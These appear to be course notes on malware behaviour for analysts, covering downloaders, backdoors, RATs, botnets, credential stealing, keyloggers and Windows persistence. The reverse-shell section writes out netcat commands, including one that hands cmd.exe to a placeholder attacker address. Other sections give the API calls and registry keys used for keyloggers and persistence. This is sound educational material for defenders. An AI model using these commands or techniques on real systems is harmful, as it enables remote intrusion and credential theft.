8.9 KiB
Malware Behaviour
Downloaders
Downloaders simply download another piece of malware from the internet and execute it on the local system. Downloaders are often packaged with an exploit.
- Downloaders often use
URLDownloadToFileA - Followed by a call to
WinExec - To download and execute the new malware
- Are often called droppers
Launchers
A launcher is any executable that installs malware for immediate or future covert execution.
- Often contains the malware payload embedded within the file
Backdoors
A backdoor is a type of malware that provides an attacker with remote access to a victim’s machine. Backdoor code often implements a full set of capabilities so when using a backdoor, attackers don't need to download additional malware or code.
- Common variants
- Reverse Shells
- Remote Access Trojans (RATs)
- Botnets
- Commonly communicate over port 80 using
HTTPHTTPis the most commonly used protocol for outgoing network traffic- So it offers the malware the best chance of blending in to normal traffic
- Often provide a common set of functionality
- Manipulate registry keys
- Enumerate display windows
- Create directories
- Search for files
- Can determine the functionality provided by looking at the Windows API functions imported
Reverse Shell
A reverse shell is a connection that originates from an infected machine and provides attackers shell access to that machine.
- The simplest type of backdoor
- Provides the attacker with a standard shell
- Offers same functionality as being logged into the machine
- Called a reverse shell because rather than the attacker connecting to the infected machine, the infected machine connects back to the attacker’s machine
- This is done as the victim's machine is often sitting behind a firewall blocking incoming traffic on most ports.
- Whereas outgoing traffic on random high-numbered ports is often unblocked
- Either offered standalone or as part of a more sophisticated backdoor
Creating a reverse shell
Using Netcat
-
Can be created quite simply using the
netcatprogram-
This is done by setting up a listener on the attacker’s machine
-
Example:
nc -l -p 80- Where
-lis the listen flag and-pis the port flag to listen on 80
- Where
-
Then netcat is run on the victim’s machine
-
Example:
nc <attackers ip> 80 -e cmd.exe -
The
-eoption is the program to execute over the connection once the connection is established- Tying std input and std output from the program to the network socket
-
Using Windows API
This can be done in two ways: basic and multi-threaded
The basic method is popular as it is easy to write and achieves the same thing.
It uses a call to CreateProcess and manipulates the STARTUPINFO structure.
- First a socket to the remote server is established
- That socket’s standard streams are stored and spliced into
STARTUPINFO - So that when
CreateProcessis called with theSTARTUPINFOpassed in, standard input, output and error are piped to the attacker
The multithreaded approach is the same, except instead of tying the streams from the command line directly to the socket, two threads sit in between (one for input, one for output). These threads can be used to encrypt and decrypt data so it is not sent in the clear.
- API calls
CreateThreadandCreatePipeshould be looked for- The two pipes are needed to redirect input and output to the thread
- Two threads are needed
- One for reading from the stdin pipe and writing to the socket
- One for reading from the socket and writing to the stdout pipe
- Then the
CreateProcessmethod can be used to tie the standard streams to the pipes instead of directly to the socket.
Remote Administration Tool (RAT)
- Often used in targeted attacks with a specific goal
- Typically communicate over common ports (e.g. 80 and 443)
- RAT server runs on the victim, implanted within malware
- Client runs remotely as a command and control unit operated by attacker
- Server connects back to the server to start a connection, then controlled by the client (the attacker)
Server will poll the client for new commands - there is not a permanent connection (so as not to arouse suspicion)
Botnet
- Botnet is a collection of compromised hosts (known as zombies)
- Controlled by a single entity through the use of a server
- Goal of a botnet to compromise as many hosts as possible
| RATs | BotNet |
|---|---|
| Typically control fewer hosts | Infect millions |
| Used in targeted attacks | Used in mass attack |
| Controlled on per-victim level | All zombies controlled at once |
Credential Stealing
- Attackers will go to great lengths to steal credentials
- Three general approaches
- Programs that wait for a user to log in
- Programs that dump information stored in Windows (e.g password hashes)
- Programs that log keystrokes
Windows Login
- Windows enables you to extend the login mechanism
- In Windows XP, this was done by the Graphical Identification and Authentication (GINA) API
- Later Windows versions use Credential Provider
- Possible to use these to install credential stealers by pretending to be a credential provider
Place a piece of code between winlogin.exe and magina.dll. By changing the dll to a malicious one.
Hash Dumping
- Another popular method of obtaining Windows credentials is hash dumping
- Aim is to copy the password hashes off system
- Don't get the password, but often get an equivalent
- Source code for several tools is available, often used by malware authors
- But also recognised by antivirus authors - therefore malware authors modify it slightly
Keyloggers
- Intercepting Windows login or hash dumping will only provide details of the username and password to log into the computer
- Will not provide details of other resources
- Alternative approach is to log user key presses
- This will capture any password typed into the system
- Keyloggers can be implemented in both kernel space and user space
- Kernel-based is very difficult to detect with user-level applications
- Frequently used as part of a rootkit
- Acting as a keyboard driver to capture keystrokes bypasses user-space programs and protections
User-space keyloggers
- Windows API provides two ways to implement a keylogger in user-space
- Hooking - get Windows to notify the malware every time a key is pressed
- Hooking typically makes use of
SetWindowsHookEx() - Can alter key presses as well
- Typically will include an
.exewhich will initiate the hook function - And a
dllto handle the logging - This
dllis injected to other processes on the system
- Hooking typically makes use of
- Polling - malware interrogates Windows to see if a specific key is pressed
- Make use of the
GetAsyncKeyState()API function which returns a boolean - All the keys are iterated through to see what specific key is pressed
GetForegroundWindow()- shows window title
- Make use of the
- Hooking - get Windows to notify the malware every time a key is pressed
Identifying Keyloggers
- If malware wants to log all keys, then it will need to have names for keys like
[Num Lock],[Page Up],[Page Down]or the cursor keys - Might also have strings such as
qwerty...vbnmpresent
Persistence Mechanisms
- Various ways malware can get on a system
- But also needs to ensure it stays on the system for a long time
- Otherwise rebooting the system would be enough to clear it
- Various mechanisms are available for the malware to hook in
Via Registry
- Various places in the Windows Registry that can be used to install malware permanently
- Most popular is to register under:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- Tools available that can show all the programs that will automatically run on your system
- Note that the mechanisms available change as Windows develops
Image File Executable Options
- One option is the image File Execution Options in the registry
- Aimed at letting you debug a program
- Set at:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ImageFileExecution Options\{exe}
- Can set a key here called debugger which contains the full path to the debugger (or your malware)
- Set this on a program that is likely to run and the malware will be launched when the program is run
- Can also be used for malware analysis
SVCHOST DLLs
- Malware often installed as a Windows service
- But typically requires implementing as an
exe - However, Windows provides
svchost.exethat lets you implement a service as adll - Many Windows services are implemented as a
DLLusingsvchost.exe - Causes the malware to blend into the process list and registry better
